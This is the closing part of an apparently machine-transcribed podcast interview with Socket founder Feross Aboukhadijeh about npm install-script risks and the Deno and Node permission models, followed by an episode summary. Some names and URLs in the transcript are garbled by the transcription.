I don't know if there's a really good way for a lot of this AI stuff because a lot of the adoption is being driven by like company boards and, you know, company leadership. They don't want to be left behind. They're getting asked all the time, like, what is your AI strategy? What are you going to do for AI? And so there's a lot of pressure to like, just tell everybody, like to just use all the stuff, you know, and not to worry so much about security. So even formerly very security conscious companies and, you know, CTOs and engineering leaders are kind of like lowering their standards a little bit in this rush to, you know, adopt this stuff super fast. So I don't have a great answer for you like how to generally solve this problem. I think security will get figured out over the next couple of years like it always does with these things and it will be bolted on and it'll have a bunch of gotchas as it always does when you do it after the fact. So I don't know. We'll see.
Josh Goldberg
We'll see. I've got one last technical question, just as a curiosity. There are sort of traditional ways to run JavaScript that you've mentioned, Node and npm and now there are kind of newer versions of those variants like PNPM and Denote that have more restrictive security models. Do you have thoughts or opinions on those in the security landscape given what we've talked about?
Faras Abu Khadija
Yeah, I think that I love more experimentation. I love to see the stuff that those teams are doing. I think that pnpm, I believe, now restricts install scripts by default. So that's awesome to see because like I said, yes, they have legitimate uses, but if you have a backdoor package, if you have a malicious package, like the vast majority of them are going to use that feature. And the other thing that's nice about it is it's such a rarely used piece of functionality that it's actually not that onerous to just ask the user, hey, is it okay if this package runs this install script? So I think it's really great what they did. And then Deno obviously has like its permission model, which is really interesting. I'm a fan of that. Node has also actually kind of adopted a similar, it's pretty different, but it sort of does the same thing way of running packages with really locked down permissions on those executions. So it's great to see this kind of stuff. I mean, I will say, like I've really met very few people that actually are able to use that. Like, you know, I don't want to pick on anyone. It's Node and Dino's permissions model is like, it's not really used in my experience, at least in real world applications. It's really helpful when you're pulling a random script off the Internet and you want to run it and you don't want to give it access to the network and to your file system and stuff. It's amazing. But like if you're Building a real application like, you know, that has to do all the things like talk to the network, read the files, you know, all this stuff, you're going to give it all the permissions anyway. And so I think it's good, but it's not widely used and not really in its final form yet.
Josh Goldberg
More feature rich experimentation required?
Faras Abu Khadija
Yeah, I think so. And then more work on the developer experience, like how do you write these policy files? Like the node policy file is really complex format last I looked at it. So I think there'll need to be some ways to auto generate that, that work really effectively and don't break your application before you're going to see widespread adoption of that kind of stuff.
Josh Goldberg
Looking forward to it. For us in our last minute, I'd like to end interviews with something very much non technical. Can you tell us about your cats?
Faras Abu Khadija
Sure, yeah. So I got two cats. One is called Butter and one is called Cream and they are about one year old now actually. They just turned one and they're amazing. They're super cute. I was hesitant to get cats for a super long time because, you know, I'm really busy working on the company and just, you know, traveling a lot and I thought they would be, you know, a bit of a burden to find someone to take care of them when we're gone and stuff like that. But my wife was really excited about the idea of getting them and I've always loved cats and so she kept talking about it. And then one day I come home and in the bathroom in the bathtub, I find a bunch of litter cat food and a bunch of cat toys and I'm like, okay, she's up to something. And then like the next day when I come home, there's, there's two kittens in the house. So she just kind of like went off on her own and got them, ordered them on Craigslist actually. So there was someone was looking for a home for their, for their two kittens and she got sent some videos and then actually had them delivered via Uber, package delivery. So Uber picked them up and drove them two hours to our place. And that was probably a really fun Uber ride for that driver. Having two kittens in the car, it's been amazing. They are a joy.
Josh Goldberg
Cats are fantastic. Since you mentioned conferences earlier, I found that in cities, for example, Athens, that have a large amount of cats going out with other conference attendees and speakers to feed street cats is a surprisingly fantastic bonding and networking activity.
Faras Abu Khadija
That's so funny. So they just go out and give food to the cats and hang out with them. The wild cats.
Josh Goldberg
Yeah. Walk 30 seconds in any direction from say, city center, Athens. You'll find them.
Faras Abu Khadija
That's awesome. I also found certain parts of Tokyo or certain neighborhoods have tons of wild cats, feral cats, I guess, going around. And I just love cats. Yeah, their behaviors are super cute. They're always up to something. They're always investigating or trying to do something that they're not supposed to. It's kind of fun.
Josh Goldberg
Given how much time you spend day to day on people with very malicious intentions, it must be nice to work with a creature where the maximum maliciousness is that they want the treat you're not supposed to give them.
Faras Abu Khadija
Yeah, it's so true. They do get in trouble too. Like they do find ways to climb into things they're not supposed to get to. We just built a catio, which is like a, like a little cat house outdoors over here by my desk. And it's quite big. It's like a 8 foot by 6 foot, like outdoor structure. And they, I just crack the door and then they're able to kind of go directly into the catio, but there's currently a little gap in the part above it and so they figured out they can climb up the side of it and then get outside. So I'm going to have to like add another layer of chicken wire on the top to kind of fully seal it with the door or else they're going to find a way to get out.
Josh Goldberg
Crafty creatures.
Faras Abu Khadija
Yeah, for sure.
Josh Goldberg
Well, Faras, thank you so much for spending extra time to talk. Not just about your open source career and journey and what it's like to be a maintainer and all this stuff stock it is doing to help protect open source projects and companies, but also about your adorable two cats. If folks want to learn more about you and or socket, where would you ask that they go? On the Internet?
Faras Abu Khadija
Yeah, I have a blog that doesn't get updated that much, but has a bunch of my writingrost.org and then you can learn about socketoket.dev. and if folks want to email me, my email is just my first name@ Socket.dev so feel free to hit me up. I always love talking about open source or security or whatever, so feel free to reach out.
Josh Goldberg
Well, that's fantastic. For software engineering Daily, this has been Faras and Josh Goldberg. Cheers. Y' all have a nice day.
Faras Abu Khadija
Thanks Josh.
Release Date: December 9, 2025
Guest: Feross Aboukhadijeh, Founder & CEO of Socket
Host: Josh Goldberg
This episode centers on software supply chain security, with a deep dive into the risks posed by open source dependencies and practical strategies to defend against malicious packages. Feross Aboukhadijeh, an influential open-source developer and security entrepreneur, discusses his journey from early web projects, through open source burnout, to founding Socket—an advanced tool for detecting and preventing supply chain attacks.
Feross shares his contact details and expresses openness to conversations about open source and security.
Blog: feross.org
Socket: socket.dev
Email: feross@socket.dev
For further exploration, listeners are encouraged to consider their software supply chain posture, try out tools like Socket for automated vigilance, and remember: “You’re responsible for what your code does—even if you didn’t write every line.”